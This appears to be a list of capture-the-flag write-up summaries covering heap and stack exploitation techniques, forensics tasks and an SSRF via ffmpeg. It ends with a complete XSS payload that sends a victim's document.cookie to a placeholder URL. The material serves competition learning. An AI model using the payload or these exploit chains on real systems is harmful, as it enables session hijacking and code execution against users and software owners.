tl;dr

• Overflow from stdin stucture till main_arena.
• Create fake fastbin chunks to get overlapping chunk and leak.
• Overwrite __malloc_hook using fastbin attack.

tl;dr

• overflow the char candle counter stored in the wax structure and trigger uaf.
• Use the uaf to trigger double free and get shell.

tl;dr

• Finding Picture-In-Picture application capability.
• Most recently viewed web activity in Picture-In-Picture application on the device.

tl;dr

• Finding the last modified timestamp of the file that maps names to IP’s accessed.

tl;dr

• Leak with Format String bug.
• Use the arbitrary heap pointer write to overwrite __GI__IO_file_jumps.
• Inject shellode in heap and get code execution in dfprintf.

tl;dr

• Out-of bounds index write allows byte-by-byte overwrite of return address

tl;dr

• Carefully arranging structs on stack so as to overwrite saved rip , without corrupting the stack canary.
• Leak libc with puts and execute a ret2libc to get shell

tl;dr

• Overwrite mmap_threshold with null and trim top chunk size.
• Null out last 2 bytes of stdin’s _IO_buf_base and brute force to get allocation on stdin.
• Overwrite one of the jump tables with win function to get shell.

tl;dr

• Part-1: .bzr file retrival using any tool
• Part-1: exploiting ssrf via ffmpeg to read /flag file to a video and download it before it gets deleted

tl;dr

• Payload: a<math>b<xss style=display:block>c<style>d<a title="</style>"><img src onerror=document.location='https://your_url/?'.concat(document.cookie)>">e